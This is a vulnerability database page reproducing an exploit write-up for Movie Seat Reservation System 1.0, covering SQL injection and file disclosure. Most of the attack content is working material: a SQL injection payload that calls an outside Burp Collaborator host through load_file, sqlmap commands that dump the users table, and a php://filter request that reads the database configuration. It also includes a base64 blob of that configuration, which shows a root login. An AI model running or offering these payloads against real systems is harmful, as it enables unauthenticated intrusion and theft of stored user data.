Vulners
Lucene search
Movie Seat Reservation System 1.0 File Disclosure / SQL Injection
🗓️ 08 Apr 2022 00:00:00Reported by D4rkP0w4r, github.comType 
packetstorm🔗 packetstormsecurity.com👁 379 Views
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Movie Seat Reservation System 1.0 File Disclosure / SQL Injection Vulnerabilities | 8 Apr 202200:00 | – | zdt |
 | CVE-2022-28002 | 8 Apr 202209:15 | – | attackerkb |
| CVE-2022-28001 | 8 Apr 202209:15 | – | attackerkb |
 | CVE-2022-28001 | 8 Apr 202212:38 | – | circl |
| CVE-2022-28002 | 8 Apr 202212:38 | – | circl |
 | Seat Reservation System SQL注入漏洞 | 8 Apr 202200:00 | – | cnnvd |
| Seat Reservation System安全漏洞 | 8 Apr 202200:00 | – | cnnvd |
 | Movie Seat Reservation System SQL Injection Vulnerability | 15 Apr 202200:00 | – | cnvd |
 | CVE-2022-28001 | 8 Apr 202208:23 | – | cve |
| CVE-2022-28002 | 8 Apr 202208:23 | – | cve |
10
`# Movie Seat Reservation System Sql Injection
# Author: D4rkP0w4r
* Note => exploit don't need login account
# Exploit
* Use Burp Suite capture request with payload
GET /Movie_Seat_Reservation_System/index.php?page=reserve&id=(select%20load_file('%5c%5c%5c%5coumvuo0qifuf18d8xd3vrtn81z7svqjhl5cs3gs.burpcollaborator.net%5c%5cbxr')) HTTP/1.1
Host: 192.168.1.101:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Connection: close
Cache-Control: max-age=0
Then save as moviesqli.txt
* Exploit with Sqlmap
python3 sqlmap.py -r moviesqli.txt --current-user
python3 sqlmap.py -r moviesqli.txt --batch -dbs
python3 sqlmap.py -r moviesqli.txt --batch -tables -D theater_db
python3 sqlmap.py -r moviesqli.txt --batch -columns -D theater_db -T users -dump
# Vulnerable Code
* No filter id when inserting data to database
-------
# Movie Seat Reservation System File Disclosure
# Author: D4rkP0w4r
* Note => don't need login
# Exploit
* Exploit with Burp Suite
http://192.168.1.101:8080/Movie_Seat_Reservation_System/index.php?page=home
* Use Burp Suite capture request and payload => Send
* Then decode Base64 PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg==
# POC
* Request
GET /Movie_Seat_Reservation_System/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Movie_Seat_Reservation_System/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=0722dtqnb1dgvuono8uubajcae
Connection: close
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2022 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.00545